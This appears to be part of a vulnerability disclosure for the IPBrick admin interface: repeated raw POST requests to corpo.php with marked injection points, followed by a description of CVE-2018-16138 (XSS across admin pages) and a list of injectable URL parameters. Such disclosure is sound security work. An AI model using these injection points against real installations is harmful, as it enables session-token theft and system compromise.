-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"imap_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"smtp_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"db_server\"\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"login_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"logo_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"can_export\"\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_users\"\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_prefs\"\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_calendar_info\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_show_company_logo\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_hide_never\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_one_year_max\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_state\"\x0d\x0a\x0d\x0a0*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_resource_users\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_interval\"\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"lastrmt\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_name[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_doAction[1]\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_action[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"show_alt_emails\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"horde_signature\"\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"f_accao\"\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a

POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"imap_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"smtp_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"db_server\"\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"login_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"logo_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"can_export\"\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_users\"\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_prefs\"\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_calendar_info\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_show_company_logo\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_hide_never\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_one_year_max\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_state\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_resource_users\"\x0d\x0a\x0d\x0a*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_interval\"\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"lastrmt\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_name[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_doAction[1]\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_action[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"show_alt_emails\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"horde_signature\"\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"f_accao\"\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a

POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"imap_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"smtp_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"db_server\"\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"login_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"logo_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"can_export\"\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_users\"\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_prefs\"\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_calendar_info\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_show_company_logo\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_hide_never\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_one_year_max\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_state\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_resource_users\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_interval\"\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"lastrmt\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_name[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_doAction[1]\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_action[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"show_alt_emails\"\x0d\x0a\x0d\x0a0*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"horde_signature\"\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"f_accao\"\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a

POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"imap_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"smtp_server\"\x0d\x0a\x0d\x0aipbrick.domain.com*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"db_server\"\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"login_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"logo_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"can_export\"\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_users\"\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_prefs\"\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_calendar_info\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_show_company_logo\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_hide_never\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_one_year_max\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_state\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_resource_users\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_interval\"\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"lastrmt\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_name[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_doAction[1]\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_action[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"show_alt_emails\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"horde_signature\"\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"f_accao\"\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a

POST
https://ipbrick.domain.com/corpo.ph
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"imap_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"smtp_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"db_server\"\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"login_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"logo_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"can_export\"\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_users\"\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_prefs\"\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_calendar_info\"\x0d\x0a\x0d\x0a1*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_show_company_logo\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_hide_never\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_one_year_max\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_state\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_resource_users\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_interval\"\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"lastrmt\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_name[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_doAction[1]\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_action[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"show_alt_emails\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"horde_signature\"\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"f_accao\"\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a

POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"imap_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"smtp_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"db_server\"\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"login_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"logo_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"can_export\"\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_users\"\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_prefs\"\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_calendar_info\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_show_company_logo\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_hide_never\"\x0d\x0a\x0d\x0a0*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_one_year_max\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_state\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_resource_users\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_interval\"\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"lastrmt\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_name[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_doAction[1]\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_action[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"show_alt_emails\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"horde_signature\"\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"f_accao\"\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a

POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"imap_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"smtp_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"db_server\"\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"login_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"logo_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"can_export\"\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_users\"\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_prefs\"\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_calendar_info\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_show_company_logo\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_hide_never\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_one_year_max\"\x0d\x0a\x0d\x0a0*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_state\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_resource_users\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_interval\"\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"lastrmt\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_name[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_doAction[1]\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_action[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"show_alt_emails\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"horde_signature\"\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"f_accao\"\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a

POST
https://ipbrick.domain.com/corpo.php
---------------------------9988894693323536491681056513
Content-Length: 540
-----------------------------9988894693323536491681056513
Content-Disposition: form-data; name="pagina"
voip_placas_pstn_inserir
-----------------------------9988894693323536491681056513
Content-Disposition: form-data; name="tipoplaca"
115561371*
-----------------------------9988894693323536491681056513
Content-Disposition: form-data; name="manufacturer"
6
-----------------------------9988894693323536491681056513
Content-Disposition: form-data; name="numportas"
1
-----------------------------9988894693323536491681056513--

POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="pagina"
webmail_alterado
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="imap_server"
ipbrick.domain.com
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="smtp_server"
ipbrick.domain.com
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="db_server"
localhost
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="login_patch"; filename=""
Content-Type: application/octet-stream
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="logo_patch"; filename=""
Content-Type: application/octet-stream
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="can_export"
t
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="admin_users"
10000
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="admin_prefs"
administrator
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="tb_plugin_calendar_info"
1
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="tb_plugin_show_company_logo"
1*
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="tb_plugin_recur_hide_never"
0
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="tb_plugin_recur_one_year_max"
0
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="resources_executing_state"
0
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="resources_resource_users"
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="resources_executing_interval"
2
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="lastrmt"
1
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="event_type_name[1]"
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="event_type_doAction[1]"
1
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="event_type_action[1]"
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="show_alt_emails"
0
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="horde_signature"
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name="f_accao"
Modify
-----------------------------11122813211374287858922608002--

CVE-2018-16138 (Cross-Site Scripting) XSS

Another Vulnerability found was XSS in ALL THE ADMINISTRATION PAGE. Looks like they don’t like to sanitize input. As seen on my other post This vulnerability can be leveraged to inject JavaScript code and steam authentication tokens, as well as compromise clients if there is an exploit for their browser. Its consider a high severity vulnerability and should not be found in any application let alone one that handles the security of the whole enterprise.

Persistent and reflective XSS attacks can be made in this application, for example, for any chance if a user is registered using a payload it will present on the web page if consulting the user list. This is risky since any kind of problems could arise from it.

*List of detected XSS vulnerable inputs*

* /corpo.php?pagina=insere_licenca&activationcode=1ej5k3*sjnkukola1o&f_accao_file=Licence File
* /corpo.php?pagina=voip_asterisk_manager&alterar=*
* /corpo.php?pagina=voip_asterisk_manager&reload=1&alterar=*&activar=t
* /corpo.php?pagina=voip_options_alterar_altera&option=callcenter&in_estado_acd_remoto=t&in_ip_ACD=&in_suf_ACD=&status_send_queue_log=t&extra_send_queue_log_ip=*&extra_send_queue_log_port=&status_send_queue_log_share=t&extra_send_queue_log_share_ip=&extra_send_queue_log_share_folder=&extra_send_queue_log_share_login=admin&extra_send_queue_log_share_pwd=123456&extra_send_queue_log_share_period=1&extra_send_queue_log_share_hour=0&f_accao=Modify
* /corpo.php?pagina=voip_options_alterar_altera&option=callcenter&in_estado_acd_remoto=t&in_ip_ACD=&in_suf_ACD=&status_send_queue_log=t&extra_send_queue_log_ip=&extra_send_queue_log_port=&status_send_queue_log_share=t&extra_send_queue_log_share_ip=*&extra_send_queue_log_share_folder=&extra_send_queue_log_share_login=admin&extra_send_queue_log_share_pwd=123456&extra_send_queue_log_share_period=1&extra_send_queue_log_share_hour=0&f_accao=Modify
